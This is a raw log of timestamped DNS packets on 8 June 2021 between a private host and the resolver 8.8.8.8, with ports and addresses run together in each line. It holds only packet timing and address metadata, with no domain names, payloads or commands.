                        Jun 8, 2021 21:46:01.954190969 CEST53499108.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:02.012041092 CEST5585453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:02.955827951 CEST53499108.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:02.997443914 CEST5585453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:03.166112900 CEST53558548.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:03.437616110 CEST6454953192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:04.041093111 CEST53499108.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:04.434828997 CEST6454953192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:05.052217960 CEST53558548.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:05.453898907 CEST6454953192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:05.497453928 CEST53645498.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:05.570528984 CEST6315353192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:06.495476007 CEST53645498.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:06.612905025 CEST6315353192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:07.523649931 CEST53645498.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:07.637537956 CEST53631538.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:07.839531898 CEST5299153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:08.667673111 CEST53631538.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:08.827095032 CEST5299153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:09.857043028 CEST5299153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:09.898715973 CEST53529918.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:09.970566988 CEST5370053192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:10.878359079 CEST53529918.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:10.966896057 CEST5370053192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:11.909037113 CEST53529918.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:11.998529911 CEST5370053192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:12.116466045 CEST53537008.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:12.360927105 CEST5172653192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:13.111957073 CEST53537008.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:13.357603073 CEST5172653192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:14.141757011 CEST53537008.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:14.404340982 CEST5172653192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:14.428513050 CEST53517268.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:14.492835999 CEST5679453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:15.412590027 CEST53517268.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:15.482626915 CEST5679453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:16.459697962 CEST53517268.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:16.498698950 CEST5679453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:16.559284925 CEST53567948.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:16.765202045 CEST5653453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:17.551523924 CEST53567948.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:17.682575941 CEST5662753192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:17.735291958 CEST53566278.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:17.779926062 CEST5653453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:18.558773994 CEST53567948.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:18.795504093 CEST5653453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:18.817079067 CEST53565348.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:18.845583916 CEST53565348.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:18.877701044 CEST5662153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:18.956360102 CEST6311653192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:19.000189066 CEST53631168.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:19.768825054 CEST6407853192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:19.811077118 CEST53640788.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:19.904709101 CEST5662153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:20.849522114 CEST53565348.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:20.905123949 CEST5662153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:21.023518085 CEST53566218.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:21.058989048 CEST6480153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:21.102824926 CEST53648018.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:21.246056080 CEST6172153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:21.963789940 CEST5125553192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:22.006076097 CEST53512558.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:22.067851067 CEST53566218.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:22.248971939 CEST6172153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:22.966429949 CEST53566218.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:23.330734015 CEST6172153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:23.406764984 CEST53617218.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:23.491897106 CEST6152253192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:23.585839033 CEST5233753192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:23.630388975 CEST53523378.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:24.303822994 CEST53617218.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:24.499166965 CEST6152253192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:25.381407022 CEST53617218.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:25.520415068 CEST6152253192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:25.544979095 CEST53615228.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:26.081139088 CEST5504653192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:26.364808083 CEST4961253192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:26.406956911 CEST53496128.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:26.549565077 CEST53615228.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:27.093158960 CEST5504653192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:27.170964956 CEST4928553192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:27.213892937 CEST53492858.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:27.578676939 CEST53615228.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:28.108696938 CEST5504653192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:28.133059978 CEST53550468.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:28.202702045 CEST5060153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:28.381675005 CEST6087553192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:28.425586939 CEST53608758.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:29.147697926 CEST53550468.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:29.203473091 CEST5644853192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:29.245816946 CEST53564488.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:29.249587059 CEST5060153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:30.001235962 CEST5917253192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:30.044305086 CEST53591728.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:30.159603119 CEST53550468.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:30.252590895 CEST53506018.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:30.471527100 CEST6242053192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:30.915079117 CEST6057953192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:30.971255064 CEST53605798.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:31.391915083 CEST53506018.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:31.468352079 CEST6242053192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:32.398669004 CEST5018353192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:32.441801071 CEST53501838.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:32.499547005 CEST6242053192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:32.521692991 CEST53624208.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:32.534461021 CEST53624208.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:32.584973097 CEST6153153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:33.267777920 CEST4922853192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:33.310291052 CEST53492288.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:33.609155893 CEST6153153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:34.200391054 CEST5979453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:34.243145943 CEST53597948.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:34.568773985 CEST53624208.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:34.649571896 CEST53615318.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:34.676616907 CEST53615318.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:34.842267036 CEST5591653192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:35.876543045 CEST5591653192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:35.903491020 CEST53559168.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:35.967943907 CEST5275253192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:36.132097006 CEST6054253192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:36.174747944 CEST53605428.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:36.929928064 CEST53559168.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:37.000228882 CEST5275253192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:37.725966930 CEST6068953192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:37.768333912 CEST53606898.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:38.005538940 CEST6420653192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:38.021327019 CEST53527528.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:38.135736942 CEST53642068.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:38.201216936 CEST5090453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:38.594966888 CEST5752553192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:38.638233900 CEST53575258.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:38.755841017 CEST5381453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:38.764880896 CEST5341853192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:38.800532103 CEST53538148.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:38.810175896 CEST53534188.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:39.055157900 CEST53527528.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:39.203886986 CEST5090453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:39.227360010 CEST6283353192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:39.269656897 CEST53628338.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:39.923281908 CEST5926053192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:40.042031050 CEST53592608.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:40.251085043 CEST5090453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:40.255594969 CEST53509048.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:40.319829941 CEST4994453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:40.473319054 CEST6330053192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:40.610764027 CEST53633008.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:41.185889959 CEST6144953192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:41.229986906 CEST53614498.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:41.272996902 CEST53509048.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:41.328957081 CEST4994453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:41.882488966 CEST5127553192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:41.927103996 CEST53512758.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:42.322325945 CEST53509048.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:42.362428904 CEST4994453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:42.377063036 CEST53499448.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:42.412216902 CEST6349253192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:42.601085901 CEST53634928.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:43.006941080 CEST5894553192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:43.381939888 CEST53499448.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:44.133902073 CEST5894553192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:44.412440062 CEST53499448.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:44.795120001 CEST6077953192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:44.921123981 CEST53607798.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:45.058058977 CEST53589458.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:45.122220993 CEST6401453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:45.813216925 CEST5709153192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:45.858104944 CEST53570918.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:46.111083984 CEST6401453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:46.191679001 CEST53589458.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:46.504319906 CEST5590453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:46.546845913 CEST53559048.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:47.157222033 CEST6401453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:47.190107107 CEST53640148.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:47.389873028 CEST5210953192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:48.177098989 CEST53640148.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:48.407136917 CEST5210953192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:49.217385054 CEST53640148.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:49.407537937 CEST5210953192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:49.458240032 CEST53521098.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:49.508212090 CEST5445053192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:50.473567009 CEST53521098.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:50.549647093 CEST5445053192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:51.460020065 CEST53521098.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:51.563159943 CEST53544508.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:51.747528076 CEST4937453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:52.630448103 CEST53544508.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:52.751557112 CEST4937453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:53.798799992 CEST4937453192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:53.799050093 CEST53493748.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:53.833877087 CEST53493748.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:53.847084999 CEST5043653192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:54.845546007 CEST5043653192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:55.848917961 CEST53493748.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:55.860851049 CEST5043653192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:55.906429052 CEST53504368.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:56.081727028 CEST6260553192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:56.270961046 CEST5425653192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:56.317353964 CEST53542568.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:56.895240068 CEST53504368.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:57.111162901 CEST6260553192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:57.927381039 CEST53504368.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:58.111620903 CEST6260553192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:58.141593933 CEST53626058.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:58.231235981 CEST5218953192.168.2.48.8.8.8
                        Jun 8, 2021 21:46:59.167232990 CEST53626058.8.8.8192.168.2.4
                        Jun 8, 2021 21:46:59.252168894 CEST5218953192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:00.166117907 CEST53626058.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:00.252022982 CEST5218953192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:00.375360012 CEST53521898.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:00.577198029 CEST5613153192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:01.303164005 CEST53521898.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:01.580754995 CEST5613153192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:02.311242104 CEST53521898.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:02.580833912 CEST5613153192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:02.639693975 CEST53561318.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:02.692893028 CEST6299253192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:03.650212049 CEST53561318.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:03.689793110 CEST6299253192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:04.635265112 CEST53561318.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:04.690243959 CEST6299253192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:04.753757954 CEST53629928.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:04.949143887 CEST5443253192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:05.742089987 CEST53629928.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:05.940279007 CEST5443253192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:06.741580009 CEST53629928.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:06.955763102 CEST5443253192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:06.995599985 CEST53544328.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:06.999622107 CEST53544328.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:07.054735899 CEST5722753192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:08.049606085 CEST5722753192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:09.006959915 CEST53544328.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:09.050389051 CEST5722753192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:09.118876934 CEST53572278.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:09.295856953 CEST5838353192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:10.110972881 CEST53572278.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:10.299781084 CEST5838353192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:10.346471071 CEST53583838.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:10.411015987 CEST6313653192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:11.101150036 CEST53572278.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:11.410487890 CEST6313653192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:12.360198021 CEST53583838.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:12.409337044 CEST6313653192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:12.463222027 CEST53631368.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:12.634934902 CEST5091153192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:13.478159904 CEST53631368.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:13.478791952 CEST53631368.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:13.659801006 CEST5091153192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:14.659584045 CEST5091153192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:14.685441971 CEST53509118.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:15.185108900 CEST6340953192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:15.729770899 CEST53509118.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:16.481981039 CEST6340953192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:16.714116096 CEST53509118.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:17.254282951 CEST53634098.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:17.961178064 CEST5918553192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:18.536780119 CEST53634098.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:18.956878901 CEST5918553192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:20.004018068 CEST5918553192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:20.016000032 CEST53591858.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:20.076462984 CEST6423653192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:21.015921116 CEST53591858.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:21.054079056 CEST53591858.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:21.066327095 CEST6423653192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:22.113267899 CEST6423653192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:22.136045933 CEST53642368.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:22.336220980 CEST5615753192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:23.136607885 CEST53642368.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:23.332197905 CEST5615753192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:24.174911976 CEST53642368.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:24.363570929 CEST5615753192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:24.389036894 CEST53561578.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:24.449955940 CEST5560153192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:25.384382963 CEST53561578.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:25.457873106 CEST5560153192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:25.519726038 CEST53556018.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:25.612840891 CEST5298453192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:25.666011095 CEST53529848.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:25.717809916 CEST5114153192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:26.427104950 CEST53561578.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:26.754235029 CEST5114153192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:27.041246891 CEST5361053192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:27.093954086 CEST53536108.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:27.522811890 CEST53556018.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:27.754870892 CEST5114153192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:27.780371904 CEST53511418.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:27.845082045 CEST6124753192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:28.824048042 CEST53511418.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:28.863986969 CEST6124753192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:29.824358940 CEST53511418.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:29.909408092 CEST53612478.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:30.084748030 CEST6516553192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:30.916280031 CEST53612478.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:31.083328962 CEST6516553192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:32.114192009 CEST6516553192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:32.136877060 CEST53651658.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:32.189172983 CEST5207653192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:33.151773930 CEST53651658.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:33.176843882 CEST5207653192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:34.166973114 CEST53651658.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:34.208899021 CEST5207653192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:34.240186930 CEST53520768.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:34.429323912 CEST5490353192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:35.231642962 CEST53520768.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:35.443193913 CEST5490353192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:36.265803099 CEST53520768.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:36.458527088 CEST5490353192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:36.501844883 CEST53549038.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:36.563122034 CEST5504553192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:37.493937969 CEST53549038.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:37.552800894 CEST5504553192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:38.519963026 CEST53549038.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:38.613956928 CEST53550458.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:38.807032108 CEST5446453192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:39.622416973 CEST53550458.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:39.802510023 CEST5446453192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:40.864825010 CEST5446453192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:40.868098021 CEST53544648.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:40.934251070 CEST5097053192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:41.862596035 CEST53544648.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:41.915184021 CEST53544648.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:41.927423000 CEST5097053192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:42.958767891 CEST5097053192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:43.001543045 CEST53509708.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:43.184807062 CEST5526153192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:44.070219040 CEST53509708.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:44.193227053 CEST5526153192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:45.015480042 CEST53509708.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:45.193996906 CEST5526153192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:45.244647980 CEST53552618.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:45.297132015 CEST5980953192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:46.256390095 CEST53552618.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:46.287997961 CEST5980953192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:47.253948927 CEST53552618.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:47.303075075 CEST5980953192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:47.349199057 CEST53598098.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:47.535079002 CEST5127853192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:48.341305017 CEST53598098.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:48.522089958 CEST5127853192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:48.602914095 CEST53512788.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:48.657644987 CEST5193253192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:49.365561962 CEST53598098.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:49.647190094 CEST5193253192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:50.575690985 CEST53512788.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:50.662636995 CEST5193253192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:50.713604927 CEST53519328.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:50.718641043 CEST53519328.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:50.917951107 CEST5949453192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:51.912719011 CEST5949453192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:52.731357098 CEST53519328.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:52.959919930 CEST5949453192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:52.988394976 CEST53594948.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:53.047916889 CEST5591553192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:53.964979887 CEST53594948.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:54.010020018 CEST53594948.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:54.037939072 CEST5591553192.168.2.48.8.8.8
                        Jun 8, 2021 21:47:54.116904020 CEST53559158.8.8.8192.168.2.4
                        Jun 8, 2021 21:47:56.097395897 CEST53559158.8.8.8192.168.2.4

